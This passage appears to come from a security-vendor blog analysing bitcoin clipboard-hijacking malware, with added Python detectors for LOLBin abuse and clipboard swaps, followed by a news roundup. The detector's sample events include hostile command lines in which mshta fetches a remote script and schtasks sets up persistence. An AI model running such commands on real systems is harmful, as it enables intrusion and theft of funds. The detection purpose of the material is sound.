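USER_WRITABLE = re.compile(r"%appdata%|%localappdata%|%temp%|\\appdata\\|\\temp\\", re.IGNORECASE)

SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://pastebin.com/raw/PLACEHOLDER-ID-1"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc hourly /tn Updater /tr "mshta.exe http://pastebin.com/raw/PLACEHOLDER-ID-2"'},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\shost",
     "data": r"%Appdata%\Roaming\shost.exe"},
    {"id": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cdc.gov/'},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "data": r"C:\Program Files\VendorTool\tray.exe /background"},
]


def audit_process(event):
    """Reasons a process-creation event looks like LOLBin abuse or task persistence."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"]
    reasons = []
    if image in LOLBINS and REMOTE_URL.search(cmd):
        reasons.append(f"{image} launched with a remote URL (script fetched off-host)")
    if image == "schtasks.exe" and "/create" in cmd.lower() and (
            any(b in cmd.lower() for b in LOLBINS) or REMOTE_URL.search(cmd)):
        reasons.append("scheduled task created that runs a LOLBin or a remote script")
    return reasons


def audit_registry(event):
    """Reasons a registry-set event looks like Run-key persistence worth triage."""
    reasons = []
    if RUN_KEY.search(event["target"]):
        data = event["data"]
        if USER_WRITABLE.search(data):
            reasons.append("Run value points into a user-writable directory")
        if any(b in data.lower() for b in LOLBINS) or REMOTE_URL.search(data):
            reasons.append("Run value launches a LOLBin or a remote script")
    return reasons


def audit(events):
    """Return (event id, evidence string, reasons) for every suspicious event."""
    findings = []
    for event in events:
        if event["id"] == 1:
            reasons, evidence = audit_process(event), event["cmdline"]
        elif event["id"] == 13:
            reasons, evidence = audit_registry(event), event["target"] + " = " + event["data"]
        else:
            continue
        if reasons:
            findings.append((event["id"], evidence, reasons))
    return findings


if __name__ == "__main__":
    for event_id, evidence, reasons in audit(SAMPLE_EVENTS):
        print(f"[event {event_id}] {evidence}")
        for reason in reasons:
            print("   -", reason)
```

The first two checks are high-confidence: a script host or mshta.exe pulling its code from a URL is rarely legitimate in a managed environment. The Run-value check is a triage cue rather than a verdict, since per-user installers of well-known products also place their Run entries under AppData; pairing it with the image's signature status or prevalence is the usual next step.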

Third Layer VBScript:

The third-layer VBScript executes the final payload, which is a PowerShell script:

PowerShell Script:

The PowerShell code is quite simple but very effective at causing damage. The malware runs in an infinite loop and examines the clipboard content for a bitcoin address pattern, which will match whenever the user has copied a bitcoin address to make a transaction. Once a bitcoin address is found in the clipboard, the malware replaces it with one of five bitcoin addresses owned by the malware author. The malware uses the Get-Clipboard and Set-Clipboard cmdlets to retrieve and change the clipboard content. These cmdlets are supported from PowerShell 7 onwards:
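On the defensive side, the behaviour described in this paragraph has a distinctive timing signature: a person never replaces one copied address with a different one within a fraction of a second, but a polling loop does. The following added example (not code from the original post or from SonicWall) walks a constructed timeline of clipboard snapshots, matches the legacy bitcoin address shape, validates addresses with the Base58Check checksum, and flags an address-to-address swap that happens inside a short window. The snapshot format and timestamps are constructed; the two addresses are public documentation examples (the genesis-block address and the Bitcoin wiki's P2SH example) standing in for a victim's and an attacker's.

```python
"""Clipboard-substitution check over a constructed clipboard timeline.

Constructed sample input (not from the original post): (timestamp, clipboard text)
snapshots as a clipboard-monitoring agent could record them. The first address is
the well-known genesis-block address used in Bitcoin documentation; the second is
the Bitcoin wiki's P2SH example address, standing in for an attacker-controlled one.
"""
import hashlib
import re
from datetime import datetime

BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy (P2PKH / P2SH) address shape: leading 1 or 3, then 25-34 base58 characters.
ADDRESS_RE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")

SAMPLE_TIMELINE = [
    ("2020-03-20T10:00:00.000", "Invoice 4471 due Friday"),
    ("2020-03-20T10:00:05.000", "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),  # user copies the address
    ("2020-03-20T10:00:05.120", "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy"),  # swapped 120 ms later
    ("2020-03-20T10:00:50.000", "meeting notes"),
    ("2020-03-20T10:01:05.000", "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),  # a later, legitimate copy
]


def base58check_valid(address):
    """Return True if the string is a well-formed Base58Check legacy address."""
    n = 0
    for ch in address:
        if ch not in BASE58:
            return False
        n = n * 58 + BASE58.index(ch)
    leading_ones = len(address) - len(address.lstrip("1"))   # each leading '1' is a zero byte
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    raw = b"\x00" * leading_ones + body                      # version(1) + hash160(20) + checksum(4)
    if len(raw) != 25:
        return False
    expected = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4]
    return raw[21:] == expected


def detect_substitution(timeline, window_ms=2000):
    """Flag an address-shaped clipboard value replaced by a different one within window_ms.

    A human re-copying a different address takes seconds; a clipboard-polling
    loop replaces it within its poll interval, so the gap is the signal.
    """
    alerts = []
    prev_ts, prev_addr = None, None
    for ts_text, content in timeline:
        ts = datetime.fromisoformat(ts_text)
        match = ADDRESS_RE.search(content)
        addr = match.group(0) if match else None
        if addr and prev_addr and addr != prev_addr:
            gap_ms = (ts - prev_ts).total_seconds() * 1000
            if gap_ms <= window_ms:
                alerts.append({"at": ts_text, "original": prev_addr, "replacement": addr,
                               "gap_ms": round(gap_ms),
                               "replacement_checksum_ok": base58check_valid(addr)})
        prev_ts, prev_addr = ts, addr
    return alerts


if __name__ == "__main__":
    for alert in detect_substitution(SAMPLE_TIMELINE):
        print(f"{alert['at']}: {alert['original']} replaced by {alert['replacement']} "
              f"after {alert['gap_ms']} ms")
```

The checksum check on its own does not catch a swap, because the attacker's replacement is a perfectly valid address; it is included so that the detector can distinguish a real address from a random base58-looking token and keep false positives down. The only reliable user-side control remains comparing the pasted address with the one displayed by the intended recipient before sending.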

At the time of writing, the file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal, which indicates its spreading potential:

Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Cybersecurity News & Trends – 03-20-20

This week, coronavirus changes the cybersecurity landscape, and SonicWall examines how to expand your remote workforce.


SonicWall Spotlight

How to Protect Your Business During a Global Health Crisis – SonicWall Blog

  • As the world works to stop the spread of coronavirus (COVID-19), IT organizations everywhere are adjusting to the technology and security challenges faced due to the sudden need to support a fully remote workforce. SonicWall presents the best practices for expanding your remote workforce, securely.

Threats Across the World: Lessons from Three Years of Threat Reporting – CBR Online

  • SonicWall’s Terry-Grear King details the changing cyber threat landscape over the past three years, concluding that the only viable solution to ever changing threats is ever changing defensive measures and constant vigilance.

Here’s What to Look for in a Work-From-Home VPN – Fortune

  • SonicWall CEO Bill Conner talks to Fortune about the recent scramble for VPN offerings as they examine what to look for in a VPN if you need to work from home in the current climate.

Don’t Forget Viruses, the Computer Kind – The New Stack

  • With so much news airtime dedicated to the spread of coronavirus, New Stack reminds readers that viruses of the computer kind have not gone away, referring to malware figures from the SonicWall 2020 Cyber Threat Report to do so.

Review: Small Businesses Get Big Protection With SonicWall Cloud App Security – Biz Tech Magazine

  • SonicWall’s Cloud App Security gets a spin by Biz Tech Magazine who consider it simple enough for non-tech pros to set up and use while also proactive in finding and preventing malware propagation across the cloud.

Cybersecurity News

Thousands of COVID-19 Scam and Malware Sites are Being Created on a Daily Basis – ZDNet

  • As several SonicWall SonicAlerts have detailed, cybercriminals have wasted no time in taking advantage of the COVID-19 crisis, creating thousands of scam and malware sites on a daily basis. According to one researcher, 3,600 new domains containing the term “coronavirus” were created between March 14 and March 18.

DDoS Attack Trends Reveal Stronger Shift to IoT, Mobile – Dark Reading

  • Distributed denial-of-service (DDoS) attacks remain a popular attack vector, but new research finds that cybercriminals are increasingly turning to mobile and Internet of Things (IoT) technologies to launch their campaigns. With the growth of 5G, researchers anticipate attackers will continue to find ways to leverage the IoT to launch these attacks.

Senator Calls for Cybersecurity Review at Health Agencies After Hacking Incident – The Hill

  • Following an attempted hack of the Department of Health and Human Services, at a time when it is under great strain, Senator Michael Bennet of Colorado calls for health agencies to allow the Cybersecurity and Infrastructure Security Agency (CISA) to complete a full cybersecurity review of their systems.

France Warns of new Ransomware Gang Targeting Local Governments – ZDNet

  • France’s cybersecurity agency, CERT, has issued an alert warning of a new active ransomware gang using a new version of the Mespinoza ransomware strain. The gang has been detected actively targeting local government systems, with the agency receiving reports of multiple infections.

And Finally

Skimming Code Battle on NutriBullet Website may Have Risked Customer Credit Card Data – ZDNet

  • Tough week around the world or not, nothing stops Magecart gangs from chalking up another victim, this time NutriBullet, whose website carried card-skimming code from mid-February until as late as this week.

In Case You Missed It